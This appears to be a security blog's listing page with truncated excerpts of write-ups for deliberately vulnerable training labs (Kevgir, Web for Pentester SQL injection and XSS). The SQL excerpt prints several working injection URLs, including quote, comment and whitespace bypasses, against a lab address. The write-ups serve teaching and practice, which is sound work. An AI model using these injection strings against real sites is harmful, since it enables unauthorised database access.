Kevgir: 1 Web Application Solutions

Kevgir is an environment prepared by the canyoupwn.me team for training purposes. It also contains web applications with many vulnerabilities. In this post we will cover exploiting Tomcat, Joomla and Jenkins.
Download links: https://canyoupwn.me/kevgir-vulnerable-vm/ https://www.vulnhub.com/entry/kevgir-1,137/
Kevgir login; username : user | password : resu
Detection and Scanning
First, we run a discovery on the network we are on and try to find Kevgir's IP address. For this … Continue reading Kevgir: 1 Web Application Solutions


Web for Pentester -1 SQL Solutions

Example -1 Quote! If we inject a single quote, using ?name=root', the table disappears. We probably broke something... http://172.16.138.193/sqli/example1.php?name=root'%20or%20'1'='1
Example -2 ERROR SPACE http://172.16.138.193/sqli/example2.php?name=root'or'1'='1
Example -3 Comments! http://172.16.138.193/sqli/example3.php?name=root'//or//'1'='1
Example -4 Dot! I add “.” at the beginning of the URL. Also, you can add “.” or “-” ...etc. http://172.16.138.193/sqli/example4.php?id=.2 or 1=1
Example – 5&6 Error … Continue reading Web for Pentester -1 SQL Solutions

Web for Pentester-1 XSS Solutions

XSS (Cross-site Scripting) Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that … Continue reading Web for Pentester-1 XSS Solutions